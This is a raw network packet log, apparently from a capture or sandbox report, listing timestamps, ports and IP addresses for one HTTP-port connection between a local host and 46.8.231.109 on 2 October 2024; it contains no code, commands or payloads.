Oct 2, 2024 09:41:22.589601040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589634895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589659929 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589660883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589660883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589660883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589669943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589725971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589726925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589736938 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589761019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589797974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589814901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589832067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589844942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589865923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589883089 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589899063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589910030 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589932919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589967966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.589987040 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.589987040 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590007067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590039968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590050936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590073109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590085030 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590110064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590163946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590198040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590230942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590264082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590297937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590298891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590298891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590298891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590298891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590337992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590364933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590379953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590387106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590394020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590401888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590408087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590409040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590420008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590429068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590435982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590444088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590450048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590459108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590466022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590472937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590478897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590487003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590495110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590501070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590503931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590512037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590518951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590527058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590533972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590540886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590548992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590562105 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590565920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590574980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590583086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590584040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590718031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.590800047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.590800047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.591061115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.637629032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.637629032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.642692089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.642729998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.642785072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.642813921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.642842054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.866750002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.867315054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.943440914 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.943694115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:22.948607922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.948646069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:22.948681116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:23.269002914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:23.269762993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:23.283180952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:23.288619041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:23.493695974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:23.493772984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:23.902071953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:23.907269955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.117491007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.117563963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.346239090 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.352001905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521246910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521321058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521337032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521353960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521369934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521660089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521672964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521687984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521703005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521717072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521732092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521748066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521764994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521790028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.521795034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.521795034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.521795034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.521795034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.521795034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.521795034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.523403883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.523403883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603264093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603307962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603365898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603406906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603434086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603456974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603471994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603528023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603562117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603595972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603627920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603651047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603651047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603651047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603662014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603696108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603729010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603758097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603795052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603827953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603864908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603899002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603930950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603943110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603943110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603943110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603943110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603943110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603943110 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.603965998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.603998899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.604032040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.604063988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.604098082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.604130030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.604140043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604140043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604140043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604140043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604140043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604140043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604165077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.604197979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.604229927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.604263067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.604299068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.604315042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604315042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604315042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604315042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604315042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.604492903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.682424068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.682506084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.682531118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.682547092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.682563066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.682579041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.682614088 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.682751894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.682780027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.682904959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.682920933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.682939053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.683024883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.683024883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.683024883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.683024883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.683024883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.683712959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.684087038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.684106112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.684135914 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.684282064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.684441090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.684484959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.684731960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.684837103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.684874058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.684921980 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.684921980 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.684921980 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.685739994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.685993910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686028004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686113119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686162949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686194897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686227083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686239004 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686239004 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686239004 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686239004 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686239004 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686256886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686290026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686321974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686350107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686382055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686397076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686397076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686397076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686397076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686397076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686413050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686444044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686475992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686503887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686532974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686564922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686583042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686583042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686583042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686583042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686595917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686626911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686660051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686692953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686722994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686731100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686732054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686732054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686732054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686732054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686753988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686786890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686817884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686850071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686881065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686907053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686918974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686918974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686918974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686918974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686918974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686918974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686939001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.686945915 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.686969995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687000990 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687031984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687062025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687071085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.687072039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.687072039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.687072039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.687093973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687124014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687180042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687207937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687239885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687272072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687282085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.687282085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.687282085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.687282085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.687282085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.687302113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.687411070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.687411070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.763729095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.763885021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.763989925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764066935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764173985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764224052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764256954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764285088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764317036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764348984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764380932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764414072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764425039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764425039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764425039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764425039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764425039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764425039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764461040 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764487982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764519930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764552116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764583111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764614105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764647961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764678955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764709949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764719009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764719009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764719009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764719009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764719009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764719009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764740944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764774084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764802933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764832973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764866114 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764866114 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764866114 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764866114 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764866114 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764868021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764899015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764929056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764960051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.764982939 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764982939 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.764982939 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765013933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.765089035 CEST	80	49749	46.8.231.109	192.168.2.4
